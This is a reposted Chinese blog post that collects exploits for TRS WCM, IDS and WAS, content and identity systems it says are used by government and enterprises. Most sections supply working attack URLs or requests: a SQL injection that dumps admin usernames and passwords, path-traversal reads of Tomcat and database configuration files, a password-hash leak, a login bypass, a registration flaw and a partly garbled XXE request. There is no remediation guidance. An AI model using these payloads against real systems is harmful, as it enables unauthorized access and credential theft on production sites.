红炉点雪

TRS漏洞整理

TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下。

WCM内容管理系统

WCM5.2~WCM6.5存在SQL注入

首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp
直接注入

1
http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
1
http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG

注:存在注入参数为:OrderTypeOrderField

WCM任意文件下载漏洞

漏洞存在于wcm/app/system/read_image.jsp读取上传图片功能处,可构造链接下载任意文件,列如

1
http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml

读取tomcat配置文件

WCM6.x系列用户密码泄漏

TRS WCM 6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列。
访问链接:

1
HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers

WCM的密码加密方式是:常规32位MD5取前15位;
如果只访问wcm/infoview.do,尽管是个错误页面,比如:
首先访问

1
http://xx.xx.xx/wcm/infoview.do

然后你再访问:

1
http://xx.xx.xx/wcm

WCM用户注册逻辑漏洞

问题出在wcm/console/auth/reg_newuser.jsp文件中
即将随意表单改成STATUS值为30,或增加STATUS字段表单。
然后提交注册
虽然说是“请等待开通!”,但实际上已经开通了,因为STATUS字段已经改成正常了。
直接登陆
虽然没什么权限,但后台存在大量注入等漏洞
可以通过注入直接操作数据库了。

1
http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx

直接下载数据库配置文件

WCM6权限绕过

首先访问wcm目录,会自动跳转到登录页面
在网址后加上查看管理员密码的链接:

1
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin

之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题
这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了

WCM全版本任意文件写入漏洞

这个是16年年初出的漏洞,当初还给北京做过一次排查。
是利用webservices的importDocuments接口匿名访问,加上畸形文件名进行利用,exp下载(原博客已失效,暂exp下载地址)

IDS身份管理系统

IDS系统任意文件读取和信息泄露漏洞

漏洞文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等,直接访问文件即可

XXE漏洞

使用cloudeye

1
POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.**X-Forwarded-For: **.**.**.**Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------1988224119974Content-Length: 196]>&xxe;

资料:https://www.secpulse.com/archives/49564.html

WAS文本检索系统

WAS未授权访问

安装目录下was40/tree文件可以看到一些后台功能
访问was40/passwd/passwd.htm输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性
未授权发布信息+xss编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证

WAS任意文件读取

问题出在/was5/web/tree文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞

1
http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties

WAS任意文件下载漏洞

问题出在was5/admin/template/download_templet.jsp文件下,构造type参数的值可以任意下载文件,

1
http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud

WAS任意文件写入

漏洞文件是was5/admin/template/customize/detailcustomize,构造template的参数值进行任意文件写入
同理还有一个问题文件/was5/admin/template/customize/outlinecustomize,利用方式一样

转载声明

作者:初心·守一 阅读原文

CONTACT